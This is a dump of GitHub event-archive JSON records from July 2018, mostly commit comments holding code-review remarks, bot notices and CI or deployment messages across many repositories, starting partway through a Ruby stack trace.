`catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-20T06:40:31Z"}
{"id":"7993214661","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29774653,"position":null,"line":null,"path":null,"commit_id":"4f6241b712e47d1dc967f9531b59ad8dc24c1c0b","created_at":"2018-07-20T06:40:39Z","updated_at":"2018-07-20T06:40:39Z","author_association":"COLLABORATOR","body":"Puzzle `360-e326c5ed` disappeared from [`shopelectro/tests/tests_selenium.py`](https://github.com/fidals/shopelectro/blob/master/shopelectro/tests/tests_selenium.py), that's why I closed #405. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-20T06:40:39Z"}
{"id":"7993214768","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29774654,"position":null,"line":null,"path":null,"commit_id":"4f6241b712e47d1dc967f9531b59ad8dc24c1c0b","created_at":"2018-07-20T06:40:41Z","updated_at":"2018-07-20T06:40:41Z","author_association":"COLLABORATOR","body":"Puzzle `360-cd212ec2` disappeared from [`shopelectro/tests/tests_selenium.py`](https://github.com/fidals/shopelectro/blob/master/shopelectro/tests/tests_selenium.py), that's why I closed #406. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-20T06:40:41Z"}
{"id":"7993219575","type":"CommitCommentEvent","actor":{"login":"fdlk"},"repo":{"name":"molgenis/molgenis-client-js-api"},"payload":{"comment":{"id":29774664,"position":170,"line":213,"path":"test/molgenis-api-client.spec.js","commit_id":"a7decfd61b30f4325b1e5218b3c3b2223d4bfbeb","created_at":"2018-07-20T06:42:05Z","updated_at":"2018-07-20T06:42:05Z","author_association":"MEMBER","body":"Probably this works fine the way it was?"}},"created_at":"2018-07-20T06:42:05Z"}
{"id":"7993220347","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29774666,"position":null,"line":null,"path":null,"commit_id":"be5be8ac12b41f83f4672d2411ec285e98ffdff3","created_at":"2018-07-20T06:42:18Z","updated_at":"2018-07-20T06:42:18Z","author_association":"COLLABORATOR","body":"Puzzle `257-f16bf56d` discovered in   [`stroyprombeton/settings/base.py`](  https://github.com/fidals/stroyprombeton/blob/master/stroyprombeton/settings/base.py)   and submitted as #266. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-20T06:42:18Z"}
{"id":"7993231044","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"mskwarczek/task-8-4"},"payload":{"comment":{"id":29774691,"position":51,"line":51,"path":"js/script.js","commit_id":"89a3f483e0e45f72d25266de3271050d2be83cae","created_at":"2018-07-20T06:45:31Z","updated_at":"2018-07-20T06:45:31Z","author_association":"NONE","body":"fajny pomysł, sam do niego doszedłeś? Nie kojarzę żeby Kodilla w ten sposób podpowiadała."}},"created_at":"2018-07-20T06:45:31Z"}
{"id":"7993233535","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"mskwarczek/task-8-4"},"payload":{"comment":{"id":29774699,"position":81,"line":81,"path":"js/script.js","commit_id":"89a3f483e0e45f72d25266de3271050d2be83cae","created_at":"2018-07-20T06:46:12Z","updated_at":"2018-07-20T06:46:12Z","author_association":"NONE","body":"`++roundNumber` DRY - można to wywołać poza switchem"}},"created_at":"2018-07-20T06:46:12Z"}
{"id":"7993235558","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"mskwarczek/task-8-4"},"payload":{"comment":{"id":29774702,"position":88,"line":88,"path":"js/script.js","commit_id":"89a3f483e0e45f72d25266de3271050d2be83cae","created_at":"2018-07-20T06:46:48Z","updated_at":"2018-07-20T06:46:48Z","author_association":"NONE","body":"to to samo co `if (newGameActive) { ... }`\r\n\r\nanalogicznie dla false będzie `if (!newGameActive) { ... }`"}},"created_at":"2018-07-20T06:46:48Z"}
{"id":"7993238190","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"zefie/android-x86_kernel_4.9"},"payload":{"comment":{"id":29774706,"position":null,"line":null,"path":null,"commit_id":"fad4647e73179bac0cd14836dcd2657aa35fa67c","created_at":"2018-07-20T06:47:32Z","updated_at":"2018-07-20T06:47:32Z","author_association":"NONE","body":"@youling257 any ideas how boot on MM ? "}},"created_at":"2018-07-20T06:47:32Z"}
{"id":"7993239094","type":"CommitCommentEvent","actor":{"login":"AUTHAI-bit"},"repo":{"name":"trezor/connect"},"payload":{"comment":{"id":29774709,"position":4,"line":12,"path":"README.md","commit_id":"34fe6bc2fa95f5b50781a0f599c11f7e9f90ad38","created_at":"2018-07-20T06:47:47Z","updated_at":"2018-07-20T06:47:47Z","author_association":"NONE","body":"chrome-extension://imloifkgjagghnncjkhggdhalmcnfklk/index.html#/dashboard\r\n[TREZOR Password Manager.zip](https://github.com/trezor/connect/files/2212801/TREZOR.Password.Manager.zip)\r\n"}},"created_at":"2018-07-20T06:47:47Z"}
{"id":"7993243550","type":"CommitCommentEvent","actor":{"login":"alvinthen"},"repo":{"name":"taessina/gatsby-source-firestore"},"payload":{"comment":{"id":29774716,"position":null,"line":null,"path":null,"commit_id":"5c28588e70a92bf253cc66abcfbb2ab48714b386","created_at":"2018-07-20T06:49:04Z","updated_at":"2018-07-20T06:49:04Z","author_association":"MEMBER","body":"Wrong commit message, it should be v1.0.3"}},"created_at":"2018-07-20T06:49:04Z"}
{"id":"7993244303","type":"CommitCommentEvent","actor":{"login":"Doncassino"},"repo":{"name":"Doncassino/TriAzur_code"},"payload":{"comment":{"id":29774718,"position":null,"line":null,"path":null,"commit_id":"682e2f551bcc526ae7adcdf29a3b99c446374450","created_at":"2018-07-20T06:49:18Z","updated_at":"2018-07-20T06:49:18Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/b09e3ee0-bc62-4bd7-bcf6-7b033dada6af?env_id=ibm%3Ayp%3Aus-south \"TriAzurUE\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/57bc70fc-3a85-4eb7-a477-d1a67ac25fb2?env_id=ibm%3Ayp%3Aus-south \"TriAzurUE\") deployed [TriAzur_code](https://github.com/Doncassino/TriAzur_code/releases/tag/deploy-ibm-yp-eu-gb-TriAzur-TriAzur-20180720-064917 \"deploy-ibm-yp-eu-gb-TriAzur-TriAzur-20180720-064917\") to [TriAzur](https://console.bluemix.net/apps/11b7850a-b04f-4546-975c-fb2662c615cd?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:TriAzur:TriAzur\"), including this commit"}},"created_at":"2018-07-20T06:49:18Z"}
{"id":"7993245591","type":"CommitCommentEvent","actor":{"login":"healygreggatyahoo"},"repo":{"name":"healygreggatyahoo/d85commerce"},"payload":{"comment":{"id":29774720,"position":null,"line":null,"path":null,"commit_id":"107f641e37f33b123179ee0b29ffcfb955393ebc","created_at":"2018-07-20T06:49:40Z","updated_at":"2018-07-20T06:49:40Z","author_association":"OWNER","body":"Created multidev environment [d85commerce#ci-1](https://dashboard.pantheon.io/sites/807852f7-aed6-4e88-9d1a-894d6b87c3a3#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-d85commerce.pantheonsite.io/)"}},"created_at":"2018-07-20T06:49:40Z"}
{"id":"7993246243","type":"CommitCommentEvent","actor":{"login":"godrm"},"repo":{"name":"code-squad/swift-storeapp"},"payload":{"comment":{"id":29774721,"position":5,"line":15,"path":"StoreApp/StoreApp/Commons/NetworkManager.swift","commit_id":"9db5cff93323bd41909152daa3b0bbb8aee0fcc1","created_at":"2018-07-20T06:49:51Z","updated_at":"2018-07-20T06:49:51Z","author_association":"CONTRIBUTOR","body":"이거 reachabilityManager 변수를 옵셔널로 만들지 않는게 어떻겠냐고 했는데\r\nNetworkManager가 싱글톤이라 옵셔널이 되어버렸네요. \r\n싱글톤인데 옵셔널일 필요가 있을까요? 싱글톤인데 옵셔널이면 참조할 때마다 불편할 것 같거든요. \r\n내부에서도 객체가 항상 있는데 옵셔널로 쓰고, 옵셔널 체크를 해야 하는 상황이 되어 버렸네요. \r\n본인이 상관없으면 넘어갑시다. "}},"created_at":"2018-07-20T06:49:51Z"}
{"id":"7993253049","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/railway_station"},"payload":{"comment":{"id":29774731,"position":88,"line":15,"path":"main.rb","commit_id":"b6b0c8edecf8468594e9b5f502041f01bd927216","created_at":"2018-07-20T06:51:52Z","updated_at":"2018-07-20T06:51:52Z","author_association":"NONE","body":"названия переменных в единственном числе, а в них хранится много станций"}},"created_at":"2018-07-20T06:51:52Z"}
{"id":"7993254784","type":"CommitCommentEvent","actor":{"login":"tyr034"},"repo":{"name":"block-dog/news"},"payload":{"comment":{"id":29774735,"position":41,"line":47,"path":"server/entities/user/api.js","commit_id":"5363bcf775fcc2bb765d59ae71d57486c0b9221a","created_at":"2018-07-20T06:52:22Z","updated_at":"2018-07-20T06:52:22Z","author_association":"NONE","body":"why not just delete this part？"}},"created_at":"2018-07-20T06:52:22Z"}
{"id":"7993255594","type":"CommitCommentEvent","actor":{"login":"tyr034"},"repo":{"name":"block-dog/news"},"payload":{"comment":{"id":29774736,"position":44,"line":76,"path":"server/entities/user/resolvers.js","commit_id":"5363bcf775fcc2bb765d59ae71d57486c0b9221a","created_at":"2018-07-20T06:52:35Z","updated_at":"2018-07-20T06:52:35Z","author_association":"NONE","body":"same "}},"created_at":"2018-07-20T06:52:35Z"}
{"id":"7993258683","type":"CommitCommentEvent","actor":{"login":"rs-v"},"repo":{"name":"rs-v/zciji"},"payload":{"comment":{"id":29774747,"position":4,"line":3,"path":"pubg.qq.com/index.html","commit_id":"a090c7068550671d381a4dd44338d1a2fa3b1e93","created_at":"2018-07-20T06:53:34Z","updated_at":"2018-07-20T06:53:34Z","author_association":"OWNER","body":"00"}},"created_at":"2018-07-20T06:53:34Z"}
{"id":"7993259451","type":"CommitCommentEvent","actor":{"login":"RemcoG"},"repo":{"name":"BaasT/iAdvise-Course"},"payload":{"comment":{"id":29774748,"position":null,"line":null,"path":null,"commit_id":"30cdf5b756b85ea0a46a81049a54d22dfe20db95","created_at":"2018-07-20T06:53:46Z","updated_at":"2018-07-20T06:53:46Z","author_association":"NONE","body":"Mooie feature @BaasT"}},"created_at":"2018-07-20T06:53:46Z"}
{"id":"7993262754","type":"CommitCommentEvent","actor":{"login":"BlazDT"},"repo":{"name":"AdguardTeam/AdguardFilters"},"payload":{"comment":{"id":29774757,"position":null,"line":null,"path":null,"commit_id":"ea2c97fafa9c585800582cbb92b9307367571f51","created_at":"2018-07-20T06:54:44Z","updated_at":"2018-07-20T06:54:44Z","author_association":"CONTRIBUTOR","body":"Those rules are in code already only one rule.\r\n\r\nI added that new domain to the rule. Generichide rule would be unsafe as I have seen a lot sites which uses .advert for useful elements to fool adblockers."}},"created_at":"2018-07-20T06:54:44Z"}
{"id":"7993263161","type":"CommitCommentEvent","actor":{"login":"oldsharp"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":29774758,"position":null,"line":null,"path":null,"commit_id":"3ea0ce38c1fb177d6223d6e553069b817814b5fe","created_at":"2018-07-20T06:54:51Z","updated_at":"2018-07-20T06:54:51Z","author_association":"CONTRIBUTOR","body":"https://discourse.brew.sh/t/why-clang-format-use-release-tag-google-stable-xxx-instead-of-release-601-final/2612"}},"created_at":"2018-07-20T06:54:51Z"}
{"id":"7993263549","type":"CommitCommentEvent","actor":{"login":"bhuvanasonti"},"repo":{"name":"bhuvanasonti/sample"},"payload":{"comment":{"id":29774759,"position":1,"line":1,"path":"firstFile","commit_id":"155db1cb4a91980b278abd44e35fe461a7b80217","created_at":"2018-07-20T06:54:57Z","updated_at":"2018-07-20T06:54:57Z","author_association":"OWNER","body":"comment"}},"created_at":"2018-07-20T06:54:57Z"}
{"id":"7993266235","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29774770,"position":null,"line":null,"path":null,"commit_id":"1972a0fc0e57864655091c594d55f57103595cb8","created_at":"2018-07-20T06:55:45Z","updated_at":"2018-07-20T06:55:45Z","author_association":"OWNER","body":"The above concept allows you to simply add idb.js file (from net) and simply put it into your cache files and local directory of project\r\n\r\nBut there are some steps that must be looked into\r\n1. Make sure you use importScripts('idb.js PATH') if you want it to make accessible to your service worker too, so that you can perform tasks when offline too\r\n2. In order to use indexedDB you need to reserve you request as a clone and then work on it\r\nin this example we are trying to store the posts in the indexedDB\r\n3. The above step can only be used if you have opened up/created your collection and datastore\r\nthat is only possible if you use the idb object in a promise because idb.js provides you with a idb object which always returns a promise. Here idb_promise is used to handle it\r\n4. once the above steps are done, you are good to open the store and enter your data\r\nbut data in the indexedDB is entered in the form of transactions. So, it is important to do all the insertion/retrieval in one transaction. If any of the steps fail, the transaction fails and nothing happens partially to the document. This is in accordance to provide Atomicity to the transactions.\r\n5. After the transactions have been done, make sure you return transaction.complete to the promise. This marks that the transaction is complete."}},"created_at":"2018-07-20T06:55:45Z"}
{"id":"7993266244","type":"CommitCommentEvent","actor":{"login":"tomasnorre"},"repo":{"name":"AOEpeople/crawler"},"payload":{"comment":{"id":29774771,"position":1,"line":256,"path":"Classes/Controller/CrawlerController.php","commit_id":"f8c34315cd80e58ad09eb4dd49c84123a4c62068","created_at":"2018-07-20T06:55:45Z","updated_at":"2018-07-20T06:55:45Z","author_association":"CONTRIBUTOR","body":"Thanks 👍 \r\n"}},"created_at":"2018-07-20T06:55:45Z"}
{"id":"7993268611","type":"CommitCommentEvent","actor":{"login":"goodman-capu"},"repo":{"name":"goodman-capu/homebrew-cask"},"payload":{"comment":{"id":29774772,"position":null,"line":null,"path":null,"commit_id":"89ca9dc8ccb0767f37514d1e9f3d0041a90985b9","created_at":"2018-07-20T06:56:29Z","updated_at":"2018-07-20T06:56:29Z","author_association":"OWNER","body":"Hi. The download URL is broken. It's now https://macitbetter.com/dl/BetterZip-4.1.3b.zip (notice the 'b')"}},"created_at":"2018-07-20T06:56:29Z"}
{"id":"7993273816","type":"CommitCommentEvent","actor":{"login":"sclsdhlr"},"repo":{"name":"sclsdhlr/316proj"},"payload":{"comment":{"id":29774788,"position":11,"line":31,"path":"net_guard/log.h","commit_id":"c4450a8545b04e5170748b59412b4b1f4b82e542","created_at":"2018-07-20T06:58:03Z","updated_at":"2018-07-20T06:58:03Z","author_association":"OWNER","body":"可以用这种方式在打印log之前打出DBG,INFO,ERR等前缀"}},"created_at":"2018-07-20T06:58:03Z"}
{"id":"7993280052","type":"CommitCommentEvent","actor":{"login":"lavanyamanne2"},"repo":{"name":"lavanyamanne2/moodle-block_mycoursestatus"},"payload":{"comment":{"id":29774804,"position":null,"line":null,"path":null,"commit_id":"fd1b5257646cba242d5e3b993be4150712c4895e","created_at":"2018-07-20T06:59:48Z","updated_at":"2018-07-20T06:59:48Z","author_association":"OWNER","body":"Readme.html is not required"}},"created_at":"2018-07-20T06:59:48Z"}
{"id":"7993282352","type":"CommitCommentEvent","actor":{"login":"sirTribble"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29774818,"position":null,"line":null,"path":null,"commit_id":"88e64ceee9410ee589d808c5e9923e7ec33a48de","created_at":"2018-07-20T07:00:23Z","updated_at":"2018-07-20T07:00:23Z","author_association":"NONE","body":"I tested this a lot yesterday.\r\nthe maxFrameRefresh is not forced when i'm out of combat and no wow events fires.\r\nsituation that a tried to fix:\r\n- i'm out of combat\r\n- script have condition like this:\r\nif mouseover.InRange(throw_glaive_veng) and SpellCooldown(infernal_strike) <=0 and not InCombat() Spell(infernal_strike)\r\n\r\nwhen i added only \" or OvaleGUID:UnitGUID(\"mouseover\")\" it worked halfway - when i move mouse to enemy, condition updates, but when i move mouse away - there was no refresh  and that condition still believed  true by ovale.\r\n\r\nso i decided to add some \"force refresh\" by adding fullscan option for guid to fire refresh constantly\r\n\r\nI believe that correct solution to this problem - is to detect and fire refresh  to any changes to player targets (target, focus mouseover) - when he get it, and when he loose it. But my lua skill is still inferior to do it myself :)\r\n\r\nAnd BTW there is something weird with vengeance DH in ovale - his spellbook (in debug) have duplicated spells with different ID's and ovale fails to calculate SpellCooldown() for some spell for some reason. I updated spell definitions but problem persists - will try to look at this more.\r\n\r\n"}},"created_at":"2018-07-20T07:00:23Z"}
{"id":"7993283640","type":"CommitCommentEvent","actor":{"login":"toxictripx"},"repo":{"name":"toxictripx/PS3-CONSOLEN-MANAGER"},"payload":{"comment":{"id":29774820,"position":null,"line":null,"path":null,"commit_id":"3c74df9c6109928833b6606dc2edab7b4f75508b","created_at":"2018-07-20T07:00:43Z","updated_at":"2018-07-20T07:00:43Z","author_association":"OWNER","body":"![tool](https://user-images.githubusercontent.com/41461366/42987999-5d58153c-8bfb-11e8-928e-2edfb89249dd.PNG)\r\n![welcome](https://user-images.githubusercontent.com/41461366/42988000-5db5369a-8bfb-11e8-95d2-cbb45a019992.PNG)\r\n"}},"created_at":"2018-07-20T07:00:43Z"}
{"id":"7993294115","type":"CommitCommentEvent","actor":{"login":"SuperOP535"},"repo":{"name":"xF4b3r/pubgAPI"},"payload":{"comment":{"id":29774838,"position":null,"line":null,"path":null,"commit_id":"c8f114e125f6c0b2427c020269188ea677274568","created_at":"2018-07-20T07:03:36Z","updated_at":"2018-07-20T07:03:36Z","author_association":"NONE","body":"❌ You can't use raw.githubusercontent as a CDN because it's mime-type is set to html."}},"created_at":"2018-07-20T07:03:36Z"}
{"id":"7993300228","type":"CommitCommentEvent","actor":{"login":"gnisha15"},"repo":{"name":"naga95/Active_particles-LAMMPS"},"payload":{"comment":{"id":29774853,"position":null,"line":null,"path":null,"commit_id":"83b9596b4fa85fefbfdd1dcb84fd5179de9e581c","created_at":"2018-07-20T07:05:17Z","updated_at":"2018-07-20T07:05:17Z","author_association":"NONE","body":"Hi, I am trying to simulate active particles using lammps. I am new here. Will you help me understanding your code, Please?"}},"created_at":"2018-07-20T07:05:17Z"}
{"id":"7993303593","type":"CommitCommentEvent","actor":{"login":"VRamakrishna"},"repo":{"name":"HyperledgerHandsOn/trade-finance-logistics"},"payload":{"comment":{"id":29774863,"position":null,"line":null,"path":null,"commit_id":"284ea59fb74774d1e257be943747784c7421f102","created_at":"2018-07-20T07:06:11Z","updated_at":"2018-07-20T07:06:11Z","author_association":"COLLABORATOR","body":"OK, that's not ideal. I'll try to add a mechanism to update the chaincode (or add a blocking warning to `trade.sh`) when it's started up in dev mode, and send to you for review."}},"created_at":"2018-07-20T07:06:11Z"}
{"id":"7993312306","type":"CommitCommentEvent","actor":{"login":"HamJin"},"repo":{"name":"HamJin/elasticsearch"},"payload":{"comment":{"id":29774878,"position":null,"line":null,"path":null,"commit_id":"a66fa8ace70e66921a629e00406a9856900b9101","created_at":"2018-07-20T07:08:34Z","updated_at":"2018-07-20T07:08:34Z","author_association":"OWNER","body":"Silly bug fixing"}},"created_at":"2018-07-20T07:08:34Z"}
{"id":"7993312568","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29774879,"position":9,"line":9,"path":"lesson_2/alphabet.rb","commit_id":"aa8ceabba18de964e2d9aca4a143a50fd598eed5","created_at":"2018-07-20T07:08:39Z","updated_at":"2018-07-20T07:08:39Z","author_association":"NONE","body":"Надо переписать код так, как будто ты не знаешь номера этих букв. \r\nВообщем-то это и цель, узнать эти номера и противопоставить буквам.\r\nА то мы хотим узнать номера этих букв, но мы их уже знаем. "}},"created_at":"2018-07-20T07:08:39Z"}
{"id":"7993312919","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29774881,"position":34,"line":34,"path":"src/main/java/ComputerProcess/ComputerProcess.java","commit_id":"687fb248cc943fd13cfde916db23a53194a72ac9","created_at":"2018-07-20T07:08:45Z","updated_at":"2018-07-20T07:08:45Z","author_association":"NONE","body":"Да, всё верно"}},"created_at":"2018-07-20T07:08:45Z"}
{"id":"7993313490","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki-contrib/macro-sequence"},"payload":{"comment":{"id":29774883,"position":4,"line":44,"path":"pom.xml","commit_id":"4702b32a8e5a8a85f0bd2220bd5cb2201bf60bc2","created_at":"2018-07-20T07:08:54Z","updated_at":"2018-07-20T07:08:54Z","author_association":"MEMBER","body":"Fixing, thanks for noticing"}},"created_at":"2018-07-20T07:08:54Z"}
{"id":"7993313936","type":"CommitCommentEvent","actor":{"login":"elinqqpeter"},"repo":{"name":"elinqqpeter/hello-world"},"payload":{"comment":{"id":29774885,"position":null,"line":null,"path":null,"commit_id":"811de9c64922fbbf8463bb6677206afcf28d9e0a","created_at":"2018-07-20T07:09:03Z","updated_at":"2018-07-20T07:09:03Z","author_association":"OWNER","body":"test  test "}},"created_at":"2018-07-20T07:09:03Z"}
{"id":"7993314355","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29774886,"position":16,"line":16,"path":"lesson_2/alphabet.rb","commit_id":"aa8ceabba18de964e2d9aca4a143a50fd598eed5","created_at":"2018-07-20T07:09:10Z","updated_at":"2018-07-20T07:09:10Z","author_association":"NONE","body":"нет пустой строки в конце файла. \r\nвидишь github отмечает 2мя красными символами?"}},"created_at":"2018-07-20T07:09:10Z"}
{"id":"7993317185","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki-contrib/macro-sequence"},"payload":{"comment":{"id":29774890,"position":4,"line":44,"path":"pom.xml","commit_id":"4702b32a8e5a8a85f0bd2220bd5cb2201bf60bc2","created_at":"2018-07-20T07:09:52Z","updated_at":"2018-07-20T07:09:52Z","author_association":"MEMBER","body":"Fixed"}},"created_at":"2018-07-20T07:09:52Z"}
{"id":"7993318538","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29774892,"position":8,"line":8,"path":"lesson_2/arr_integer.rb","commit_id":"aa8ceabba18de964e2d9aca4a143a50fd598eed5","created_at":"2018-07-20T07:10:14Z","updated_at":"2018-07-20T07:10:14Z","author_association":"NONE","body":"нет пустой строки. \r\n+ лови еще 2 других способа\r\n`(10..100).step(5).to_a`\r\n`(2..20).map{|x| x * 5 }`"}},"created_at":"2018-07-20T07:10:14Z"}
{"id":"7993320548","type":"CommitCommentEvent","actor":{"login":"elinqqpeter"},"repo":{"name":"elinqqpeter/hello-world"},"payload":{"comment":{"id":29774893,"position":null,"line":null,"path":null,"commit_id":"811de9c64922fbbf8463bb6677206afcf28d9e0a","created_at":"2018-07-20T07:10:47Z","updated_at":"2018-07-20T07:10:47Z","author_association":"OWNER","body":"test again "}},"created_at":"2018-07-20T07:10:47Z"}
{"id":"7993322514","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29774896,"position":21,"line":21,"path":"lesson_2/date.rb","commit_id":"aa8ceabba18de964e2d9aca4a143a50fd598eed5","created_at":"2018-07-20T07:11:20Z","updated_at":"2018-07-20T07:11:20Z","author_association":"NONE","body":"странный elsif без условия"}},"created_at":"2018-07-20T07:11:20Z"}
{"id":"7993323622","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29774900,"position":457,"line":457,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-20T07:11:38Z","updated_at":"2018-07-20T07:11:38Z","author_association":"OWNER","body":"Are we on the same page regarding this? If you have any more questions, I'm happy to answer."}},"created_at":"2018-07-20T07:11:38Z"}
{"id":"7993324264","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29774902,"position":23,"line":23,"path":"lesson_2/date.rb","commit_id":"aa8ceabba18de964e2d9aca4a143a50fd598eed5","created_at":"2018-07-20T07:11:48Z","updated_at":"2018-07-20T07:11:48Z","author_association":"NONE","body":"зачем два раза puts в коде? "}},"created_at":"2018-07-20T07:11:48Z"}
{"id":"7993326909","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29774912,"position":22,"line":22,"path":"lesson_2/date.rb","commit_id":"aa8ceabba18de964e2d9aca4a143a50fd598eed5","created_at":"2018-07-20T07:12:32Z","updated_at":"2018-07-20T07:12:32Z","author_association":"NONE","body":"во-первых лучше написать \r\nday_count += day\r\nво вторых day_count тут всегда равен 0, потому зачем складывать day с 0? "}},"created_at":"2018-07-20T07:12:32Z"}
{"id":"7993328639","type":"CommitCommentEvent","actor":{"login":"RalphCorderoy"},"repo":{"name":"square/go-jose"},"payload":{"comment":{"id":29774914,"position":9,"line":31,"path":"cipher/ecdh_es.go","commit_id":"789a4c4bd4c118f7564954f441b29c153ccd6a96","created_at":"2018-07-20T07:13:00Z","updated_at":"2018-07-20T07:13:00Z","author_association":"NONE","body":"The error message is wrong. The output size must be no more than 1<<16."}},"created_at":"2018-07-20T07:13:00Z"}
{"id":"7993328793","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29774915,"position":null,"line":null,"path":null,"commit_id":"8375c97aac0f98c37a66333b71ce1b4e5fbec9bc","created_at":"2018-07-20T07:13:02Z","updated_at":"2018-07-20T07:13:02Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 44](https://teamcity.otenv.com/viewLog.html?buildId=8974447&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **UNKNOWN**\nSummary: Canceled (Step 2/2) Build time: 00:12:21"}},"created_at":"2018-07-20T07:13:02Z"}
